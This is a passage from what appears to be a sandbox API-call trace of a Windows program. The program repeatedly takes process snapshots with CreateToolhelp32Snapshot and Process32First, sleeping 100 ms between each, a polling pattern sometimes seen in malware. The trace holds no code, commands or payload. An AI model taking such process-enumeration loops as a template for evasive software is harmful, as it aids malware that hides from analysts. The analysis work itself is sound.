th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.257] Sleep (dwMilliseconds=0x64) [0123.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.370] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.437] Sleep (dwMilliseconds=0x64) [0123.549] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.559] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.616] Sleep (dwMilliseconds=0x64) [0123.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.730] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.792] Sleep (dwMilliseconds=0x64) [0123.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0123.917] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0123.975] Sleep (dwMilliseconds=0x64) [0124.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0124.090] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.149] Sleep (dwMilliseconds=0x64) [0124.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0124.262] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.323] Sleep (dwMilliseconds=0x64) [0124.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0124.448] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.505] Sleep (dwMilliseconds=0x64) [0124.615] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0124.628] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.703] Sleep (dwMilliseconds=0x64) [0124.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0124.824] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0124.890] Sleep (dwMilliseconds=0x64) [0125.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0125.022] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.105] Sleep (dwMilliseconds=0x64) [0125.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0125.219] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.308] Sleep (dwMilliseconds=0x64) [0125.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0125.420] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.510] Sleep (dwMilliseconds=0x64) [0125.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0125.624] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.751] Sleep (dwMilliseconds=0x64) [0125.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0125.874] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.945] Sleep (dwMilliseconds=0x64) [0126.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0126.060] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.123] Sleep (dwMilliseconds=0x64) [0126.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0126.252] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.324] Sleep (dwMilliseconds=0x64) [0126.440] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0126.449] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.507] Sleep (dwMilliseconds=0x64) [0126.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0126.621] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.707] Sleep (dwMilliseconds=0x64) [0126.815] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0126.825] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.891] Sleep (dwMilliseconds=0x64) [0127.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0127.014] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.085] Sleep (dwMilliseconds=0x64) [0127.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0127.205] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.281] Sleep (dwMilliseconds=0x64) [0127.402] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0127.414] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.488] Sleep (dwMilliseconds=0x64) [0127.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0127.609] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.692] Sleep (dwMilliseconds=0x64) [0127.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0127.812] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.890] Sleep (dwMilliseconds=0x64) [0128.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.014] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.076] Sleep (dwMilliseconds=0x64) [0128.240] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.250] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.307] Sleep (dwMilliseconds=0x64) [0128.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.420] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.495] Sleep (dwMilliseconds=0x64) [0128.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.609] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.690] Sleep (dwMilliseconds=0x64) [0128.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.813] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.886] Sleep (dwMilliseconds=0x64) [0128.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0128.999] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.072] Sleep (dwMilliseconds=0x64) [0129.174] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0129.186] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.259] Sleep (dwMilliseconds=0x64) [0129.362] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0129.375] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.479] Sleep (dwMilliseconds=0x64) [0129.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0129.591] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.663] Sleep (dwMilliseconds=0x64) [0129.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0129.779] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.858] Sleep (dwMilliseconds=0x64) [0129.964] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0129.978] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.065] Sleep (dwMilliseconds=0x64) [0130.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0130.192] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.270] Sleep (dwMilliseconds=0x64) [0130.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0130.396] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.461] Sleep (dwMilliseconds=0x64) [0130.573] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0130.582] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.641] Sleep (dwMilliseconds=0x64) [0130.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18ec [0130.759] Process32First (in: hSnapshot=0x18ec, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.849] Sleep (dwMilliseconds=0x64) [0130.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xfa8 [0131.007] Process32First (in: hSnapshot=0xfa8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.631] Sleep (dwMilliseconds=0x64) [0131.972] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22ac [0131.987] Process32First (in: hSnapshot=0x22ac, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.070] Sleep (dwMilliseconds=0x64) [0132.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1510 [0132.664] Process32First (in: hSnapshot=0x1510, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.020] Sleep (dwMilliseconds=0x64) [0133.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2240 [0133.260] Process32First (in: hSnapshot=0x2240, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.412] Sleep (dwMilliseconds=0x64) [0133.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0133.629] Process32First (in: hSnapshot=0x2278, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.803] Sleep (dwMilliseconds=0x64) [0133.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0134.006] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.124] Sleep (dwMilliseconds=0x64) [0134.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21b8 [0134.241] Process32First (in: hSnapshot=0x21b8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.367] Sleep (dwMilliseconds=0x64) [0134.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x226c [0134.506] Process32First (in: hSnapshot=0x226c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.616] Sleep (dwMilliseconds=0x64) [0134.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0134.758] Process32First (in: hSnapshot=0x2198, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.984] Sleep (dwMilliseconds=0x64) [0135.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0135.098] Process32First (in: hSnapshot=0x2198, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.172] Sleep (dwMilliseconds=0x64) [0135.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0135.354] Process32First (in: hSnapshot=0x2198, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.425] Sleep (dwMilliseconds=0x64) [0135.526] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0135.540] Process32First (in: hSnapshot=0x2198, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.630] Sleep (dwMilliseconds=0x64) [0135.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d4 [0135.775] Process32First (in: hSnapshot=0x21d4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.858] Sleep (dwMilliseconds=0x64) [0136.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0136.022] Process32First (in: hSnapshot=0x2198, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.122] Sleep (dwMilliseconds=0x64) [0136.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d4 [0136.292] Process32First (in: hSnapshot=0x21d4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.981] Sleep (dwMilliseconds=0x64) [0137.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2124 [0137.124] Process32First (in: hSnapshot=0x2124, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.305] Sleep (dwMilliseconds=0x64) [0137.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d4 [0137.577] Process32First (in: hSnapshot=0x21d4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.752] Sleep (dwMilliseconds=0x64) [0137.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2108 [0137.897] Process32First (in: hSnapshot=0x2108, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.067] Sleep (dwMilliseconds=0x64) [0138.451] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2108 [0138.462] Process32First (in: hSnapshot=0x2108, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.643] Sleep (dwMilliseconds=0x64) [0138.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0138.790] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.948] Sleep (dwMilliseconds=0x64) [0139.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dd4 [0139.177] Process32First (in: hSnapshot=0x1dd4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, 